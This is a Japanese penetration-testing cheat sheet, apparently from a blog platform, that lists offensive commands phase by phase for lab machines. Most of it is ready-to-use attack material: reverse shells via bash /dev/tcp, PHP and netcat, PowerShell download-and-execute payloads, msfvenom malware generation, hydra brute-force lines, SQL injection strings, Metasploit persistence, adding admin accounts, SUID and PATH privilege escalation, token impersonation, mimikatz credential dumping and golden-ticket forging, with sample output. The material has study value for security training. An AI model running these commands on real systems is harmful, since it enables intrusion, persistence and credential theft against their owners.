LoginSignup
3
4

ペネトレーションテスト チートシート

Last updated at Posted at 2022-10-04

環境情報

┌──(marseille㉿31st-Storm)-[~]
└─$ cat /etc/os-release
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2022.3"
VERSION_ID="2022.3"
VERSION_CODENAME="kali-rolling"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"

環境準備

netcatの各種準備

オプション説明

引数 説明
-l 着信待ちモード(サーバーモード)
-v 詳細の出力
-n 逆引き解決しない
-p ポート指定

サーバーモード

nc -lvnp 9999

クライアントモード

nc <IP> <Port>

Metasploit用のデータベース準備

Offensive Security Using Databases

  1. データベースの起動
systemctl start postgresql
  1. データベースの初期化
msfdb init
  1. データベースとの接続状況確認
msf> db_status
  1. ワークスペースの準備
# ワークスペース一覧表示
msf> workspace -l

# ワークスペースの削除
msf> workspace -d <workspace name>

# ワークスペースの追加
msf> workspace -a <workspace name>
  1. スキャン結果のホストデータを活用する
msf> use auxiliary/scanner/ftp/anonymous
msf> hosts -R
msf> show options
Module options (auxiliary/scanner/ftp/anonymous):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS   10.10.171.100        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    21                   yes       The target port (TCP)
   THREADS  1                    yes       The number of concurrent threads (max one per host)

参考サイト

利用フェーズ サイト名 URL
偵察 Nmap オプションマニュアル https://nmap.org/book/man-briefoptions.html
初期アクセス SQLインジェクション チートシート http://www.byakuya-shobo.co.jp/hj/moh/sqlinjectioncheatsheet.html
初期アクセス SQLmap マニュアル https://github.com/sqlmapproject/sqlmap/wiki/Usage
持続化 リバースシェル ジェネレーター https://www.revshells.com/
持続化 PHP リバースシェル https://github.com/pentestmonkey/php-reverse-shell
持続化 nishang Powershell Reverse shell https://github.com/samratashok/nishang/tree/master/Shells
権限昇格 GTFObins https://gtfobins.github.io/
権限昇格 LinPEAS https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
権限昇格 WinPEAS https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
権限昇格 Powershell 権限昇格ツール https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
権限昇格 Power View https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
権限昇格 Crack Station https://crackstation.net/
権限昇格 hashes https://hashes.com/en/decrypt/hash
その他 CyberChef https://gchq.github.io/CyberChef/

偵察(Reconnaissance)

ネットワーク探索

  • リーチャビリティがある端末
  • オープンポート/サービス/バージョン、OS
  • 共有状態のファイルシステム
  • 脆弱性の有無

Nmap

オプション説明

引数 説明
-sn Ping応答によるホスト確認、ポートスキャンはスキップ
-Pn pingによるホスト確認のスキップ
-sV ポートのバージョン確認
-sS TCP SYNスキャン
-sU UDPスキャン
-n 逆引きDNSをしない
-F 高速スキャン(nmap-servicesファイルに記載があるものを対象とする)
-O OS検出の有効化
-A OS情報、ポートのバージョン情報も含めすべてスキャン
-p ポートの指定, 「-p-」で全ポート指定
-sC / --script NSEスクリプトの利用
-T タイミングの指定(T0〜T5)

タイミングについて

引数 説明
0 paranoid/IDS回避用のタイミングテンプレート
1 sneaky/IDS回避用のタイミングテンプレート
2 polite/スキャン処理速度を落として帯域幅とマシンのリソース消費量を抑える
3 normal/指定しなかった場合のデフォルト値
4 Aggressive/適度に高速で信頼性のネットワークがある想定でスキャン速度を向上させる
5 insane/非常に高速なネットワーク上にいるか、一部の精度を犠牲にしてスキャン速度を向上させる

サブドメイン列挙

gobusterのvhost、dnsでも実施できるが、Hack The Boxでは以下のやり方だったら発見できたため、ケースバイケースとなる

# -fc:レスポンスコード302を除外
$ ffuf -w /usr/share/wordlists/wfuzz/general/common.txt -u http://hoge.htb -H "Host: FUZZ.hoge.fuga" -fc 302

端末の有無確認

nmap -sn <CIDR>

端末のポートスキャン(バージョン確認)

nmap -sV <target>

FTPへの匿名ログインチェック

nmap -p21 --script ftp-anon <target>

vsftpdのバックドア確認

nmap -p21 --script ftp-vsftpd-backdoor <target>

Rustscan

nmapと比べると速い。最新バージョンでは「-a」でIPアドレスやIPレンジを指定し、「--」以降でNmapで使うオプションを指定することにより同じことをすることができる。

$ rustscan --version
rustscan 2.1.1

$ rustscan -a 10.10.11.242 -- -sV -A -n
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/marseille/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.242:22
Open 10.10.11.242:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -A -n" on ip 10.10.11.242
Depending on the complexity of the script, results may take some time to appear.

SMB探索

情報列挙

# nmapを利用する場合
nmap -p <Port Num> --script smb-enum-*  <target>

# enum4linux-ngを利用する場合
enum4linux -a <IP>
enum4linux-ng.py <IP>

共有フォルダの情報列挙

crackmapexecはアクセス権限情報まで表示してくれるため便利

# ディレクトリレベルでの情報列挙
crackmapexec smb <IP> -u <username> -p "" --shares
# 再帰的にファイル情報まで列挙(出力は/tmpディレクトリ配下でJSON形式)
crackmapexec smb <IP> -u <username> -p "" --shares -M spider_plus

smbmap -u <username> -H <IP>

smbclient -L //<IP>

脆弱性有無確認

nmap -p <Port Num> --script smb-vuln-*  <target>

SIDユーザーの列挙

# ユーザー名は適当でOK、パスワードは不明なため -no-passオプションをつけること
python3 /<your install path>/impacket/examples/lookupsid.py <username>@<IP> -no-pass

ログイン+ファイル列挙

smbclient //<IP>/Path -U <username>

kerberos探索

88/tcpが空いている場合、ユーザー名やパスワード、ブルートフォース可否の列挙が可能

#kerbruteを用いる場合
./kerbrute_linux_amd64 userenum --dc <DC IP> -d <Dmain Name> <username list>

# impacketを用いてユーザーのハッシュを取得
## ユーザー指定の場合
python3 /<your install path>/impacket/examples/GetNPUsers.py -dc-ip <IP> <Domain Name>/<username>
## ユーザー一覧ファイルを指定する場合
## !! ドメイン名はあらかじめ/etc/hostsでマッピングしておくこと
python3 /<your install path>/impacket/examples/GetNPUsers.py <Domain name>/ -no-pass -usersfile <user file>

# impacketを用いて各ユーザーの資格情報を取得
python3 /<your install path>/impacket/examples/secretsdump.py <domain>/<username>:<password>@<IP>

# evil-winrmを用いて侵入可能性をチェック
evil-winrm -i <target IP> -u <username> -p <password>
evil-winrm -i <target IP> -u <username> -H <NTLM hash>

# psexecを用いて侵入可能性をチェック
python3 /<your install path>/impacket/examples/psexec.py <domain>/<username>@<IP> -hashes <LM:NTLM>

# wmiexecを用いて侵入可能性をチェック
python3 /<your install path>/impacket/examples/wmiexec.py <domain>/<username>@<IP> -hashes <LM:NTLM>

Web探索

  • ディレクトリ構造/コンテンツシステム
    • 問い合わせ系などメール送信系はOSコマンドインジェクションの活用潜在性あり
  • コンテンツ
    • robots.txt インデックス化を明示的に避けているコンテンツ
    • favicon.ico OWASP faviconDBと照合しフレームワークをチェック
    • sitemap.xml サイトマップの確認
  • システムバージョン

gobuster

拡張子指定なしで大半はうまくいくが、行かない場合は拡張子を指定して再実行すること。php,txt,htmlを指定しておくと良い

gobuster dir -u <URL> -w <ワードファイル> -x <拡張子> -t <スレッド数> -b <コンテンツなしと判断する応答コード(カンマ区切り)>

dirb

dirb <URL> <ワードファイル> -X <拡張子>

WordPress

# ユーザーの列挙
wpscan --url http://10.10.211.179 --enumerate u

DNS探索

ゾーン転送

dig axfr <domain> @<DNS server>

SMTP探索

SMTP通信を活用して存在するユーザー一覧を取得する

msf> use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(scanner/smtp/smtp_enum) > set USER_FILE /usr/share/seclists/Usernames/top-usernames-shortlist.txt
msf auxiliary(scanner/smtp/smtp_enum) > set RHOSTS <IP>
msf auxiliary(scanner/smtp/smtp_enum) > exploit

[*] 10.10.30.44:25        - 10.10.30.44:25 Banner: 220 polosmtp.home ESMTP Postfix (Ubuntu)
[+] 10.10.30.44:25        - 10.10.30.44:25 Users found: administrator

SQL探索

msf > use auxiliary/admin/mysql/mysql_sql

資源開発(Resource Development)

マルウェア開発

msfvenom

オプション説明

引数 説明
-p ペイロードの指定
-f フォーマット(ファイルタイプ)の指定
-e エンコーディングの指定
-o アウトプット先およびファイル名の指定

ペイロードには種類があり、モジュール名にも分類がある。

種類 モジュール命名規則 説明
ステージャー shell/〜〜〜 ファイルを実行し段階を経て目的を実行する。メモリへのペイロード挿入をAMSIで検知されやすい
ステージレスペイロード shell_ 実行後即座にペイロードを実行。使いやすいが検知されやすい
AMSI:Anti-Malware Scan Interface

マルウェア作成

msfvenom -p <payload> -f <format> -o <path/filename> LHOST=<listen-IP> LPORT=<listen-port>

初期アクセス(Initial Access)

ブルートフォース

Hydra

サポートプロトコル

It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

オプション説明

引数 説明
-l ユーザー名の指定
-P パスワードリストの指定
-t スレッド数
-s ポート番号の指定
http-post-form httpフォームのPOSTに対する攻撃
htt-get Basic認証に対する攻撃

SSH ブルートフォース

hydra -l <ユーザー名> -P <パスワードリスト> ssh://<target> -t 6

SMB ブルートフォース

hydra -l <ユーザー名> -P <パスワードリスト> <IP> smb

HTTP Basic認証ブルートフォース

hydra -l <ユーザー名> -P <パスワードリスト> <IP> http-get <path>

HTTP ログインフォーム ブルートフォース

POST時のボディ部を参考にhttp-post-formの引数の中身を作成する。特にユーザー名、パスワードおよび失敗時の文章は入念に確認すること。

hydra -l <ユーザー名> -P <パスワードリスト> <target> http-post-form "<ログインフォームパス>:<フォームID名>=^USER^&<フォームPW名>=^PASS^:<失敗時の文言>"

# 実行例
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.1.159 http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:Username or password invalid"

# 実行例@WordPress login
hydra -l c0ldd -P /usr/share/wordlists/rockyou.txt "http-post-form://10.10.211.179/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.211.179%2Fwp-admin%2F&testcookie=1:incorrect." -V

SQLログイン

手作業

mysql -h <IP> -u <username> -p

Metasploitを活用

# データベースのダンプ
msf > use auxiliary/scanner/mysql/mysql_schemadump

# ハッシュのダンプ
msf > use auxiliary/scanner/mysql/mysql_hashdump

SQLインジェクション

手作業

admin' OR 1=1 # --

SQLmap

BurpSuiteと組み合わせ、POSTした際のヘッダー、ボディをエクスポートしたデータを流用しインジェクションを行う

オプション説明

引数 説明
-r サンプルリクエストの指定
-p テストフィールドの名前を指定
--current-user DB接続のユーザー表示
--current-db 現在のDB名表示
--dbs データベース一覧の表示
-D データベースの指定
-T テーブルの指定
--tables テーブル一覧の表示
--columns カラム一覧の表示
--dump データの出力

DMBSのユーザー名確認

sqlmap -r <HTTPリクエストデータファイル> -p <フィールド名> --current-user

接続しているDB名の表示

sqlmap -r post_request.txt -p blood_group --current-db

データベースの一覧表示

sqlmap -r post_request.txt -p blood_group --dbs

指定したデータベースに含まれるテーブル一覧の表示

sqlmap -r post_request.txt -p blood_group -D blood --tables

指定したテーブルのカラム一覧の表示

sqlmap -r post_request.txt -p blood_group -D blood -T flag --columns

指定したデータベースを出力する

sqlmap -r post_request.txt -p blood_group -D blood -T flag --dump

NFSアクセス

portmapperとしてTCP/111で動作している。列挙しアクセス可能な状態を調査、悪用する。

# nmapを使う場合
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <IP>

# コマンドを使う場合
showmount -e <IP>

# マウント
mount <IP>/<Direcotry> /<mount point>
sudo mount -t nfs <IP>:/<Directory> /<mount point> -nolock

実行(Execution)

Exploit-DB

┌──(marseille㉿31st-Storm)-[~/tryhackme]
└─$ searchsploit blogengine
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                           |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection                                                                                                                         | xml/webapps/48422.txt
BlogEngine 3.3 - XML External Entity Injection                                                                                                                                           | windows/webapps/46106.txt
BlogEngine 3.3.8 - 'Content' Stored XSS                                                                                                                                                  | aspx/webapps/48999.txt
BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting                                                                                                                                  | asp/webapps/32874.txt
BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure                                                                                                                        | asp/webapps/35168.txt
BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution                                                                                                                       | aspx/webapps/46353.cs
BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Execution                                                                                                       | aspx/webapps/47010.py
BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal                                                                                                                                  | aspx/webapps/47035.py
BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution                                                                                                  | aspx/webapps/47011.py
BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection                                                                                                                               | aspx/webapps/47014.py
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(marseille㉿31st-Storm)-[~/tryhackme]
└─$ locate 47010.py
/usr/share/exploitdb/exploits/aspx/webapps/47010.py

Metasploit

モジュール検索

msf6 > search --help
Usage: search [<options>] [<keywords>:<value>]

Keywords:
  aka              :  Modules with a matching AKA (also-known-as) name
  author           :  Modules written by this author
  arch             :  Modules affecting this architecture
  bid              :  Modules with a matching Bugtraq ID
  cve              :  Modules with a matching CVE ID
  edb              :  Modules with a matching Exploit-DB ID
  check            :  Modules that support the 'check' method
  date             :  Modules with a matching disclosure date
  description      :  Modules with a matching description
  fullname         :  Modules with a matching full name
  mod_time         :  Modules with a matching modification date
  name             :  Modules with a matching descriptive name
  path             :  Modules with a matching path
  platform         :  Modules affecting this platform
  port             :  Modules with a matching port
  rank             :  Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400'))
  ref              :  Modules with a matching ref
  reference        :  Modules with a matching reference
  target           :  Modules affecting this target
  type             :  Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)

CVE番号でのモジュール検索

search cve:<xxxx-xxxxx>

exploitのキーワード検索

search type:exploit <キーワード>

モジュールの利用

モジュールの選択

use <モジュール名>

モジュールのオプション(パラメーター)確認、パラメーターセット

show options
set <オプション名> <値>

ペイロードの確認、指定

種類 意味
winnet ログインユーザー権限で動くアプリ向けモジュール
winhttp サービス等バックグラウンド動作での利用向けモジュール
show payloads
use <ペイロードモジュール名>

exploitの実行

exploit

# バックグラウンド化
exploit -z

セッションのバックグラウンド化

meterpriter> background
# もしくは Ctrol+Z

持続化(Persistence)

Reverse Shell Generator

Linux

シェルでのリバースシェルの接続

# パターン1
/bin/bash -i >& /dev/tcp/<IP>/<Port> 0>&1

# パターン2(OSコマンドインジェクションが聞く場合)
php -r '$sock=fsockopen("<IP>",<Port>);exec("/bin/sh -i <&3 >&3 2>&3");'

nc -e /bin/bash <IP> <Port>

WebShell

pentestmonkey / PHP-Reverse-Shell

# php-reverse-shell.php
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

シェルのグレードアップ(パターン1)

# bashの起動
python -c 'import pty; pty.spawn("/bin/bash")'

# clearなどのコマンドを利用できるように
export TERM=xterm

# オートコンプリート、矢印等を利用できるように
$ ^Z(Ctrl + Zでバックグラウンドへ移動させる)
$ stty raw -echo; fg

シェルのグレードアップ(パターン2)

script /dev/null -qc /bin/bash
stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

便利なリスナー

# リッスン開始
rlwrap nc -lvnp <port>

# オートコンプリート、矢印等を利用できるように
$ ^Z(Ctrl + Zでバックグラウンドへ移動させる)
$ stty raw -echo; fg

Windows

ファイルダウンロード

# コマンドプロンプトで外部ファイルをダウンロード
powershell -c "Invoke-WebRequest -Uri 'http://10.14.30.112:8080/evil.exe' -OutFile 'C:\Windows\Temp\evil.exe'"

# 他のターミナルで
msf> use exploit/multi/handler

# ダウンロード+実行
powershell iex (New-Object Net.WebClient).DownloadString('http://<your IP>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <your IP> -Port <your Port>

持続化モジュールの利用(metasploit)

msf6 exploit(multi/handler) > use exploit/windows/local/persistence
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/persistence) > show options

Module options (exploit/windows/local/persistence):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DELAY     10               yes       Delay (in seconds) for persistent payload to keep reconnecting back.
   EXE_NAME                   no        The filename for the payload to be used on the target host (%RAND%.exe by default).
   PATH                       no        Path to write payload (%TEMP% by default).
   REG_NAME                   no        The name to call registry value for persistence on target host (%RAND% by default).
   SESSION                    yes       The session to run this module on
   STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM)
   VBS_NAME                   no        The filename to use for the VBS persistent script on the target host (%RAND% by default).


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.111    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/local/persistence) > set LHOST 10.14.30.112
LHOST => 10.14.30.112
msf6 exploit(windows/local/persistence) > set session 1
session => 1
msf6 exploit(windows/local/persistence) > exploit

[*] Running persistent module against DOMAIN-CONTROLL via session ID: 1
[+] Persistent VBS script written on DOMAIN-CONTROLL to C:\Users\Administrator\AppData\Local\Temp\DadQeC.vbs
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\oFenbxNzGQ
[+] Installed autorun on DOMAIN-CONTROLL as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\oFenbxNzGQ
[*] Clean up Meterpreter RC file: /root/.msf4/logs/persistence/DOMAIN-CONTROLL_20221015.4420/DOMAIN-CONTROLL_20221015.4420.rc

アカウントの作成およびグループ追加

# アカウントの追加
net user <username> <password> /add

# ローカル管理者グループに追加
net localgroup administrators <username> /add

権限昇格(Privilege Escalation)

各種参考サイト

サイト名 URL
GTFOBins https://gtfobins.github.io/
LinPEAS https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
WinPEAS https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
SUID概要 https://kazmax.zpp.jp/linux_beginner/setuserid.html

Linux

sudoの悪用

sudoで利用できるコマンド確認

sudo -l

SUIDの悪用

NFS経由

no_squashが無効化されている場合はrootユーザーで書き込み等が可能であるため悪用する

# 権限昇格用のELFをコピーする
cp ./bash /<mountpoint>

# 実行権限とSUID、所有者の設定
chmod +x /<mountpoint>/bash
chmod +s /<mountpoint>/bash
chown root /<mountpoint>/bash

# 内部ユーザーで実行して権限昇格
./bash

rootユーザーで実行できるコマンドの確認

# どちらかを実行
find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

capabilityの悪用

capの確認

getcap -r / 2>/dev/null

Cronチェック

cronプロセスでroot権限で実行しているファイルがないか確認。あればファイルを改ざんしてリバースシェルを実行

PATHチェック

PATHの悪用

root権限で実行できるプログラムがフルパス指定ではないコマンドを用いたものである場合、実行者のパスを用いてコマンドを探す。
これを悪用し、自身のパスを変更してシェルを起動させる。

mkdir /home/<username>/bin
echo "/bin/sh" > /home/<username>/bin/<command>
chmod 777 /home/<username>/bin/<command>
export PATH=/home/<username>/bin:$PATH

各種チェックツール(LinPEAS)

直接ダウンロード+実行

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

間接的ダウンロード

sudo python -m SimpleHTTPServer 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim

Windows

各種チェックツール(WinPEAS)

PowerView.ps1

# Powershellの実行ポリシーをバイパスして起動する
PS >  powershell -ep bypass

# PowerViewのロード
PS > . .\PowerView.ps1

# ユーザー列挙
PS > Get-NetUser | select cn

# 共有フォルダーの列挙
PS > Invoke-ShareFinder

# ネットワークのコンピューター列挙
PS > Get-NetComputer -fulldata | select operatingsystem

PowerUp.ps1

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
上記スクリプトを端末上で実行し、「CanReset:True」のものを探す。Trueである場合はシステム権限を有していることと同義である。
また、フォルダ名がスペースで区切られている場合は区切られる前の文字列のexeファイルを参照し、存在すれば実行するため「<前半部分>.exe」のリバースシェルプログラムを実行させる。

Meterpriter> upload /<your saved directory>/PowerUp.ps1
Meterpriter> load powershell
Meterpriter> powershell_shell
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks

サービスを探す

PS > powershell -c "GetService"

PowerShellでのサービス再起動

# PowerShellの場合
PS > sc.exe stop <Service Name>
PS > sc.exestart <Service Name>

# cmdの場合
sc stop <Service Name>
sc start <Service Name>

構成ファイルの確認

Windows展開サービスを利用した無人インストール時にはプレーンテキストでパスワードが保存されている可能性がある。

  • C:\Unattend.xml
  • C:\Windows\Panther\Unattend.xml
  • C:\Windows\Panther\Unattend\Unattend.xml
  • C:\Windows\system32\sysprep.inf
  • C:\Windows\system32\sysprep\sysprep.xml

以下が内容例である

<Credentials>
    <Username>Administrator</Username>
    <Domain>thm.local</Domain>
    <Password>MyPassword123</Password>
</Credentials>

シェルヒストリー

PowerShellのヒストリー

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

資格情報

cmdkey /list
runas /savecred /user:<UserName> cmd.exe

保存されたSSHのセッション情報

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

登録されたタスク

schtasks
schtasks /query /tn <task name> /fo list /v

トークン偽装

Metasploit経由

参考サイト:https://blog.nflabs.jp/entry/2021/12/20/094644

# 権限の確認
## SeImpersonatePrivilegeを有していること
## SeDebugPrivilegeも有しているとなおよし
whoami /priv

# トークンの偽装
meterpriter> load incognito
meterpriter> list_tokens -g
meterpriter> impersonate_token "BUILTIN\Administrator"

# プロセスのマイグレーション(services.exeにマイグレーション)
meterpriter> migrate <pid>
meterpriter> getpid

通常のシェル経由

# 権限の確認
# SeImpersonatePrivilegeがEnabledになっていること
c:\Windows\Temp>whoami
iis apppool\defaultapppool

c:\Windows\Temp>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


# 権限昇格
c:\Windows\Temp>powershell -c "Invoke-WebRequest -Uri 'http://10.13.1.50:8080/PrintSpoofer64.exe' -OutFile 'C:\Windows\Temp\PrintSpoofer64.exe'"

c:\Windows\Temp>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Metasploit

資格情報取得(Credential Access)

ハッシュダンプ

Linux

1000番台はユーザー権限

cat /etc/passwd
cat /etc/shadow

Windows

パスワードハッシュ解説 https://atmarkit.itmedia.co.jp/ait/articles/0805/08/news151_2.html
UIDが500番台は管理者権限を有している

ユーザー名:UID:ハッシュ(LM:NTLM)

impaketを使う場合

ドメイン管理者グループに属している資格情報を有している場合、他ユーザーの資格情報をSAMデータベースからダンプできる。

python3 /<your install path>/impacket/examples/secretsdump <domain name>/<username>@<IP>

metasploitを使う場合

# lsass.exeにmigrateする必要がある場合ものある
meterpriter> migrate <PID>
meterpriter> hashdump

Mimikatzを用いたゴールデンチケットの作成

管理者権限の実行確認
mimikatz # privilege::debug
Privilege '20' OK
NTLMハッシュのダンプ
mimikatz # lsadump::lsa /patch
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 5508500012cc005cf7082a9a89ebdfdf
ゴールデンチケットの作成
# TGSアカウントのハッシュとセキュリティ識別子の把握
# User名がkrbtgtであることを確認し、セキュリティ識別子とPrimary NTLM値をコピーする
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 5508500012cc005cf7082a9a89ebdfdf
    LM   :
  Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
    ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
    lm  - 0: 372f405db05d3cafd27f8e6a4a097b2c

 * WDigest
    01  49a8de3b6c7ae1ddf36aa868e68cd9ea
    02  7902703149b131c57e5253fd9ea710d0
    03  71288a6388fb28088a434d3705cc6f2a
    04  49a8de3b6c7ae1ddf36aa868e68cd9ea
    05  7902703149b131c57e5253fd9ea710d0
    06  df5ad3cc1ff643663d85dabc81432a81
    07  49a8de3b6c7ae1ddf36aa868e68cd9ea
    08  a489809bd0f8e525f450fac01ea2054b
    09  19e54fd00868c3b0b35b5e0926934c99
    10  4462ea84c5537142029ea1b354cd25fa
    11  6773fcbf03fd29e51720f2c5087cb81c
    12  19e54fd00868c3b0b35b5e0926934c99
    13  52902abbeec1f1d3b46a7bd5adab3b57
    14  6773fcbf03fd29e51720f2c5087cb81c
    15  8f2593c344922717d05d537487a1336d
    16  49c009813995b032cc1f1a181eaadee4
    17  8552f561e937ad7c13a0dca4e9b0b25a
    18  cc18f1d9a1f4d28b58a063f69fa54f27
    19  12ae8a0629634a31aa63d6f422a14953
    20  b6392b0471c53dd2379dcc570816ba10
    21  7ab113cb39aa4be369710f6926b68094
    22  7ab113cb39aa4be369710f6926b68094
    23  e38f8bc728b21b85602231dba189c5be
    24  4700657dde6382cd7b990fb042b00f9e
    25  8f46d9db219cbd64fb61ba4fdb1c9ba7
    26  36b6a21f031bf361ce38d4d8ad39ee0f
    27  e69385ee50f9d3e105f50c61c53e718e
    28  ca006400aefe845da46b137b5b50f371
    29  15a607251e3a2973a843e09c008c32e3

 * Kerberos
    Default Salt : CONTROLLER.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 64ef5d43922f3b5d

 * Kerberos-Newer-Keys
    Default Salt : CONTROLLER.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 8e544cabf340db750cef9f5db7e1a2f97e465dffbd5a2dc64246bda3c75fe53d
      aes128_hmac       (4096) : 7eb35bddd529c0614e5ad9db4c798066
      des_cbc_md5       (4096) : 64ef5d43922f3b5d

 * NTLM-Strong-NTOWF
    Random Value : 666caaaaf30081f30211bd7fa445fec4

# チケットの作成
mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
User      : Administrator
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-849420856-2351964222-986696166
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt
Lifetime  : 10/15/2022 1:34:04 AM ; 10/12/2032 1:34:04 AM ; 10/12/2032 1:34:04 AM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

ハッシュ解析

CrackStation https://crackstation.net/

John the Ripper

NTLMハッシュの解析

# John The Ripperを使う場合
john --format=NT <ハッシュファイル>

# hashcatを使う場合
hashcat -m 1000 ./mimikatz_hash.txt /usr/share/wordlists/rockyou.txt

64f12cddaa88057e06a81b54e73b949b:Password1
c39f2beb3d2ec06a62cb887fb391dee0:Password2
c4b0e1b10c7ce2c4723b4e2407ef81a2:Password3
